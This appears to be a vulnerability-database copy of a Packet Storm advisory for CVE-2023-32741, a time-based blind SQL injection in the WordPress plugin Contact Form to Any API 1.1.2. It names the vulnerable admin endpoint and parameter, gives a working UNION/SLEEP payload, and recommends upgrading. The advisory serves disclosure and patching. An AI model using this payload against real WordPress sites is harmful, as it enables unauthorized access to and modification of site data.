Lucene search

K
packetstormArvandyPACKETSTORM:175654
HistoryNov 13, 2023 - 12:00 a.m.

WordPress Contact Form To Any API 1.1.2 SQL Injection

2023-11-1300:00:00
Arvandy
packetstormsecurity.com
224
wordpress
contact form
api
sql injection
vulnerability
unauthorized access
data modification
upgrade

AI Score

6.9

Confidence

Low

EPSS

0.001

Percentile

19.3%

`# Exploit Title: WP Plugins Contact Form to Any API <= 1.1.2 - SQL Injection  
# Date: 12-11-2023  
# Exploit Author: Arvandy  
# Software Link: https://wordpress.org/plugins/contact-form-to-any-api/  
# Vendor Homepage: https://www.itpathsolutions.com/  
# Version: 1.1.2   
# Tested on: Windows, Linux  
# CVE: CVE-2023-32741  
  
# Product Description  
Contact form 7 to Any API is most powerful plugin to send cf7 data to any third party services. It can be use to send data to CRM or any REST API. Easy to use and User friendly settings. It also Save Contact Form 7 form submitted data to the database with advanced features like search and export data to csv or excel.  
  
# Vulnerability overview  
The Wordpress plugins Contact Form to Any API <= 1.1.2 is vulnerable to Blind SQL Injection (time-based) via the form_id parameter on the /wp-admin/edit.php endpoint. This vulnerability could lead to unauthorized data access and modification.  
  
# Proof of Concept  
Affected Endpoint: /wp-admin/edit.php?post_type=cf7_to_any_api&page=cf7anyapi_entries&form_id=  
Affected Parameter: form_id  
payload: 1 UNION SELECT NULL,NULL,NULL,NULL,NULL,SLEEP(5)-- -  
  
# Recommendation  
Upgrade to version 1.1.3  
`

AI Score

6.9

Confidence

Low

EPSS

0.001

Percentile

19.3%